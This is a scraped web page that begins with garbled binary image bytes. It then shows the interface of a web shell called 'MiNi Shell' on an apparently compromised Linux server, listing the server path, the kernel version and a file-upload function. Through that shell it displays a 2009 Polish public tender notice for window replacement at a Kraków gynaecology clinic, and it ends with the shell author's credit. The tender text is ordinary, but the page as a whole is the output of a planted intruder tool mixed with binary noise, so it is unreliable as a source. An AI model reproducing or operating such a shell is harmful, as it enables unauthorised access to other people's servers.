JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090513/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090513/146128-N-2009.html

<p class="kh_header"><b>Kraków: Częściowa wymiana stolarki okiennej w elewacji południowej, północnej i zachodniej dziedzińca budynku Kliniki Ginekologii w Krakowie</b><br>
<b>Numer ogłoszenia: 146128 - 2009; data zamieszczenia: 13.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Rewaloryzacji  Zespołów Zabytkowych Krakowa , ul. Bracka 13, 31-005 Kraków, woj. małopolskie, tel. (012) 422 40 99, faks (012) 422 30 75, 422 49 63.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ZRZZK.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowa jednostka organizacyjna nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Częściowa wymiana stolarki okiennej w elewacji południowej, północnej i zachodniej dziedzińca budynku Kliniki Ginekologii w Krakowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Częściowa wymiana stolarki okiennej w elewacji południowej, północnej i zachodniej dziedzińca budynku Kliniki Ginekologii w Krakowie, przy ul. Kopernika 23. Wielkość 24399.02 EURO.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.42.11.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki udziału w postępowaniu.
W postępowaniu mogą brać udział wykonawcy, którzy spełniają warunki określone w art. 22 ust.1 ustawy Prawo zamówień publicznych tj. :
-	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
-	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego lub osób zdolnych do wykonania zamówienia,
-	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
-	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego.
Opis sposobu dokonywania oceny spełnienia tych warunków.
1.	Przedmiot zamówienia mieści się w zakresie działalności wykonawcy i jest uwidoczniony w dokumentach rejestrowych wykonawcy, a jeśli specyfika wykonania przedmiotu zamówienia wymaga posiadania koncesji, zezwolenia, licencji, wykonawca udokumentuje ich posiadanie,
2.	Wykonawca udokumentuje:
swoją wiedzę i doświadczenie zawodowe w wykonywaniu prac odpowiadających swoim rodzajem i wartością robotom stanowiącym przedmiot nin. zamówienia, a w szczególności, że   wykonał siłami własnymi co najmniej 2 zamówienia w zakresie wykonania i montażu drewnianej stolarki okiennej w obiektach wpisanych do rejestru zabytków, w okresie ostatnich 5 lat o łącznej wartości  zamówień nie mniejszej niż  200.000,00 zł,

     - że dysponuje lub będzie dysponował osobami  posiadającymi kwalifikacje
     zawodowe, doświadczenie i wykształcenie niezbędne do wykonania
      zamówienia,
-	że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, a w szczególności : 
a) kierownik budowy posiada stosowne uprawnienia budowlane  określone przepisami Prawa Budowlanego, jak również wykaże się co najmniej 2-letnią praktyką na budowie przy zabytkach nieruchomych, bądź posiada uprawnienia do prowadzenia prac w obiektach zabytkowych potwierdzone stosownym zaświadczeniem Wojewódzkiego Konserwatora Zabytków, zgodnie z rozporządzeniem Ministra Kultury z dnia 9 czerwca 2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz.U. nr 150, poz.1579), a ponadto jest członkiem właściwej izby samorządu zawodowego, zgodnie z ustawą z dnia 15 grudnia 2000r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. nr 5 z 2001r., poz. 42),

                
3.Wykonawca udokumentuje:
     posiadanie środków na rachunku bankowym lub spółdzielczej kasy
                    oszczędnościowo-kredytowej lub zdolność kredytową w wysokości nie
                    mniejszej niż 30% ceny złożonej oferty,
     


4.Wykonawca złoży do oferty oświadczenie, że nie podlega wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ust.1 i 2  Ustawy (wzór formularza w tym zakresie stanowi załącznik SIWZ ). Metoda
 spełnia/nie spełnia ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania 
      określonej działalności lub czynności oraz nie podlega wykluczeniu na 
      podstawie art. 24 ustawy Prawo zamówień publicznych do oferty należy 
      załączyć :
a)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
      W przypadku składania oferty przez spółki cywilne dodatkowo obowiązuje
      załączenie umowy spółki.
b)	aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. 
      Zaświadczenia te winny być wystawione nie wcześniej niż 3 miesiące przed
      upływem terminu składania ofert,
c)	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art.24 ust.1 pkt 4-8 ustawy Prawo zamówień  publicznych, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
d)	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt 9 ustawy , wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.	W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi 
  do wykonania zamówienia, do oferty należy dołączyć :

a)	wykaz robót wykonanych w okresie ostatnich 5 lat przed dniem wszczęcia
      postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom stanowiącym przedmiot niniejszego zamówienia (zgodnie z zapisem w punkcie VI.b.2 nin. SIWZ ) w układzie tabelarycznym, wg załączonego wzoru, z podaniem nazwy i adresu obiektu, w którym zostały wykonane, nazwy i adresu firmy lub instytucji, które zleciły wykonanie tych robót, rodzaju robót, ich wartości i daty ich realizacji. Każda realizacja podana w wykazie musi być poparta dokumentami potwierdzającymi należyte wykonanie zamówienia, 
             b) wykaz osób, którymi dysponuje lub będzie dysponował wykonawca (skład zespołu wykonawczego) i które będą uczestniczyć w wykonywaniu zamówienia (w układzie według wzoru stanowiącego załącznik do SIWZ wraz z informacją dotyczącą ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności. W przypadku powierzenia części prac podwykonawcom - oprócz zakresu robót należy podać również wartość tych robót wyliczoną wg kosztorysu ofertowego, z podaniem pozycji kosztorysu ofertowego (w układzie według wzoru stanowiącego załącznik nr 10 do nin. SIWZ),

               c) pisemne  zobowiązanie innych podmiotów do udostępnienia osób zdolnych do
                   wykonania zamówienia , jeżeli w wykazie, o którym mowa w  pkcie VII. 2 lit b)
                   SIWZ wykonawca wskazał osoby, którymi będzie dysponował,    
d) kopię uprawnień budowlanych dla kierownika budowy niezbędnych do wykonania
        prac objętych zamówieniem,
               e)  kopię zaświadczenia właściwego Wojewódzkiego Konserwatora Zabytków dla
 kierownika budowy - uprawniającego do kierowania robotami wymaganej
specjalności w obiektach zabytkowych, bądź zaświadczenia firm zatrudniających          kierownika budowy - potwierdzających nazwę i lokalizację obiektu zabytkowego, na którym kierownik budowy kierował pracami budowlanymi wymaganej specjalności, czasokres zatrudnienia na tym obiekcie. Zaświadczenia firm winny potwierdzać posiadanie w sumie co najmniej dwuletniej praktyki w wymaganej specjalności przy zabytkach nieruchomych,
f)	zaświadczenie - dla kierownika budowy  o przynależności do właściwej izby
                    samorządu zawodowego wraz z potwierdzeniem ubezpieczenia go z tytułu
                    odpowiedzialności cywilnej za szkody, które mogą wyniknąć w związku 
                    z wykonywaniem samodzielnych funkcji technicznych w budownictwie.  
3.	W celu potwierdzenia, że wykonawca znajduje się w sytuacji ekonomicznej i 
  finansowej zapewniającej wykonanie zamówienia, do oferty należy załączyć : 
             informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których
                Wykonawca posiada rachunek, potwierdzającą, że wysokość posiadanych środków
                 finansowych lub zdolność kredytowa Wykonawcy jest nie mniejsza niż 30% ceny
                 ofertowej. Informacja ta winna być wystawiona nie wcześniej niż 3 miesiące
                 przed upływem terminu składania ofert,

4.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium 
  Rzeczpospolitej Polskiej zamiast dokumentów, o których mowa w pkt. VII - 
  Wykonawca składa odpowiednio dokumenty i oświadczenia zgodnie z § 2 
  ust.1,2 i 3 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w 
  sprawie rodzaju dokumentów, jakich może żądać Zamawiający od Wykonawcy 
  oraz form w jakich te dokumenty mogą być składane (Dz. U. nr 87 poz.605, ze zm.).
5.	Każdy z wykonawców wspólnie ubiegających się o zamówienie musi dołączyć 
  do oferty oświadczenie,  oraz dokumenty wystawione dla każdego z nich, 
  a wymienione w  SIWZ, które potwierdzą spełnianie warunków udziału 
  w postępowaniu każdego Wykonawcy. Pozostałe oświadczenia i dokumenty 
   muszą potwierdzać, że Wykonawcy wspólnie spełniają pozostałe warunki udziału w postępowaniu..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zrzzk.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Rewaloryzacji Zespołów Zabytkowych Krakowa, 31-005 Kraków, ul. Bracka 13. Osoba uprawniona do  wydawania SIWZ - Inspektor Nadzoru Mariusz Leśniak, pok. 107.
Cena SIWZ-  30,00 zł (w tym 22%VAT).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.06.2009 godzina 10:50, miejsce: Zarząd Rewaloryzacji Zespołów Zabytkowych Krakowa, 31- 005 Kraków,
                         ul. Bracka 13, II piętro, pokój 201.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający i wykonawcy będą się porozumiewać oraz przekazywać oświadczenia, wnioski, zawiadomienia i informacje pisemnie. Dopuszcza się możliwość przekazywania oświadczeń, wniosków, zawiadomień i dokumentów w formie faksu potwierdzonego niezwłocznie na piśmie. Osobą uprawnioną do kontaktowania się z Wykonawcami i wydawania SIWZ jest  Inspektor Nadzoru Mariusz Leśniak, pok. 107, tel. 0-12 422-24-16.


            Prace montażowe prowadzone będą w czynnym obiekcie użyteczności publicznej
            ( szpital ) w terminach uzgodnionych z użytkownikiem.   




Do oferty winny być załączone również :
a) szczegółowy kosztorys ofertowy,
c) pełnomocnictwo Wykonawców ubiegających się wspólnie o udzielenie
    zamówienia, ustanawiające pełnomocnika do reprezentowania ich 
    w postępowaniu o udzielenie zamówienia albo reprezentowania
     w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Oferta winna zawierać cenę netto i brutto (z podatkiem VAT) podaną w PLN, wynikającą ze szczegółowego kosztorysu ofertowego załączonego do oferty. Kosztorys winien zawierać wszystkie pozycje z  przedmiaru robót (z załącznika nr 1 do nin. SIWZ), wszystkie koszty dodatkowe wynikające ze specyfikacji technicznej wykonania i odbioru robót (zał. nr 2 ), zaleceń i opinii udostępnianych przez Zamawiającego i wskazanych w specyfikacji wykonania i odbioru robót, wszystkie pozostałe koszty niezbędne do wykonania przedmiotu zamówienia oraz ceny jednostkowe i nośniki cenotwórcze (stawkę roboczogodziny brutto, koszty ogólne, zysk i ewentualne inne narzuty).

Warunki dodatkowe, które winien spełnić Wykonawca :
 -   wykona zamówienie w terminie wymaganym niniejszą  specyfikacją, 
- udzieli rękojmi na wykonane prace na okres minimum 60 miesięcy, liczonych od daty  bezusterkowego odbioru końcowego przedmiotu zamówienia, 
- udzieli gwarancji na okres minimum 60 miesięcy, liczonych od bezusterkowego odbioru przedmiotu zamówienia,
 -   wyrazi zgodę na realizację zamówienia zgodnie z warunkami nin. specyfikacji,
 - ewentualne zastrzeżenia i zapytania do nin. specyfikacji złoży w siedzibie
    zamawiającego, nie później niż do sześciu dni przed terminem składania ofert,
 - w przypadku wybrania jego oferty zawrze umowę w brzmieniu jak we wzorze
   załączonym do  SIWZ ,
- w przypadku konieczności wykonania robót dodatkowych Wykonawca wyliczy wartość tych prac w oparciu o nośniki cenotwórcze (stawkę za roboczogodzinę, koszty ogólne, zysk i inne narzuty) i ceny jednostkowe nie wyższe niż w kosztorysie ofertowym obejmującym zamówienie podstawowe, 
-	Wykonawca jest zobowiązany do zapoznania się i stosowania zasad Regulaminu działań w zakresie informacji o wykorzystaniu środków z Narodowego Funduszu Rewaloryzacji Zabytków Krakowa, zwanego dalej Regulaminem, przyjętego przez Prezydium SKOZK uchwałami nr 11/2007 z 5.07.2007r. , nr 3/2008 z 19.02.2008r. i nr 10/2008 z  14.10.2008 r.

         Opis sposobu przygotowania oferty.
             1.Wykonawca może złożyć tylko jedną ofertę.
2. Nie dopuszcza się składania ofert wariantowych ani częściowych.
             3. Nie przewiduje się zamówień uzupełniających ani zawarcia umowy ramowej.
 4.Oferta winna obejmować całość zamówienia i zawierać jednoznacznie opisaną
   propozycję zrealizowania przedmiotu zamówienia w zakresie ceny netto i brutto,  terminu realizacji, udzielanej rękojmi i gwarancji, warunków płatności. Oferty częściowe, wariantowe /alternatywne/ bądź niejednoznacznie określające propozycję zrealizowania przedmiotu zamówienia będą odrzucone. 
Oferta winna zawierać cenę netto i brutto (z podatkiem VAT) podaną w PLN, wynikającą ze szczegółowego kosztorysu ofertowego załączonego do oferty. Kosztorys winien zawierać wszystkie pozycje z formularza cenowego i przedmiaru robót (z załącznika do  SIWZ), wszystkie koszty dodatkowe wynikające ze specyfikacji technicznej wykonania i odbioru robót (zał. do SIWZ), zaleceń i opinii udostępnianych przez Zamawiającego i wskazanych w specyfikacji wykonania i odbioru robót, wszystkie pozostałe koszty niezbędne do wykonania przedmiotu zamówienia oraz ceny jednostkowe i nośniki cenotwórcze (stawkę roboczogodziny brutto, koszty ogólne, zysk i ewentualne inne narzuty).




5.Składana oferta powinna być sporządzona czytelnie, w języku polskim, na formularzu   oferty, którego wzór  stanowi załącznik do SIWZ.
6.Wszystkie dokumenty załączone do oferty winny być przedstawione w formie oryginałów lub kopii poświadczonych za zgodność z oryginałem przez wykonawcę oraz winny spełniać warunki określone w rozporządzeniu Prezesa Rady Ministrów z dnia19 maja 2006 r. w sprawie rodzaju dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz.605, ze zm.).
7.Wszystkie dokumenty sporządzone w języku obcym winny być składane wraz z tłumaczeniami na język polski poświadczonymi przez Wykonawcę.Brak spełnienia tych warunków spowoduje uznanie dokumentu za nieważny.
8.Oferta wraz z oświadczeniami zawartymi w formularzu oferty winna być podpisana przez osoby uprawnione do składania oświadczenia woli w imieniu Wykonawcy. Uprawnienie to winno wynikać z dokumentów rejestrowych Wykonawcy. W przypadku udzielenia przez osoby uprawnione pełnomocnictwa innym osobom - pełnomocnictwo to winno być załączone do oferty. Pełnomocnictwo winno być przedstawione w formie oryginału i winno określać zakres udzielonego pełnomocnictwa i okres jego ważności.
9.W przypadku składania oferty wspólnie przez Wykonawców, w ofercie w miejscu pieczęci Wykonawcy należy wpisać nazwy i adresy wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia.
          10.Zaleca się by wszystkie kartki oferty wraz ze wszystkimi załącznikami do oferty
   były ponumerowane i zaparafowane przez osoby podpisujące ofertę. Wszelkie
   poprawki (błędy pisarskie) w treści oferty lub załącznikach sporządzonych przez
   Wykonawcę muszą być parafowane przez osoby podpisujące ofertę.
          11.Pożądane jest, aby załączniki były ułożone w kolejności przedstawionej 
                 w   formularzu oferty.
          12.Oferta wraz z załącznikami winna być opakowane w sposób uniemożliwiający jej otwarcie bez rozerwania opakowania. Na opakowaniu winien być umieszczony napis: Oferta na częściową wymianę stolarki okiennej w elewacji południowej, północnej i zachodniej dziedzińca budynku Kliniki Ginekologii w Krakowie, przy ul. Kopernika 23
,  oraz pełna nazwa i dokładny adres Wykonawcy.
          13.Wykonawca nie później niż w terminie otwarcia ofert może zastrzec poufność
 informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993r. o zwalczaniu nieuczciwej konkurencji (Dz.U. z 2003 r. nr 153 poz.1503 ze zm.).Wykonawca nie może zastrzec informacji podlegających
obligatoryjnemu ujawnieniu przy otwarciu oferty jak również tych, które nie mają żadnego związku z informacjami nadającymi się do ochrony w ramach tajemnicy przedsiębiorstwa.
Warunkiem podpisania umowy z wybranym wykonawcą będzie:

-   złożenie umów podpisanych z podmiotami uczestniczącymi w wykonaniu zamówienia  przedstawionymi w ofercie,
-   złożenie umowy regulującej współpracę Wykonawców, którzy złożyli wspólną ofertę,
-  złożenie polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż wartość przedmiotu zamówienia określona w ofercie Wykonawcy,bez udziału własnego Wykonawcy, franszyzy i innych ograniczeń wypłaty ubezpieczenia. Obowiązek posiadania ubezpieczenia od odpowiedzialności cywilnej Wykonawcy w zakresie prowadzonej działalności na warunkach przedstawionych wyżej obowiązywać będzie przez cały okres realizacji zamówienia. W przypadku konieczności zawarcia kolejnego ubezpieczenia, Wykonawca przed terminem upływu poprzedniego, bez wezwania Zamawiającego, dostarczy nowe ubezpieczenie do Zamawiającego. Brak aktualnego ubezpieczenia może spowodować odstąpienie Zamawiającego od umowy z winy Wykonawcy,    
-  w przypadku wyboru oferty wykonawcy będącego spółką kapitałową w rozumieniu przepisów Kodeksu Spółek Handlowych wykonawca przedstawi uchwałę wspólników do rozporządzania prawem lub zaciągania zobowiązań do świadczenia o wartości dwukrotnie przewyższającej wysokość kapitału zakładowego, chyba że umowa spółki stanowi inaczej - zgodnie z art. 230 ustawy z dnia 15 września 2000 r. Kodeks Spółek Handlowych (Dz.U. nr 94 poz.1037 ze zm.).

Creat By MiNi SheLL
Email: jattceo@gmail.com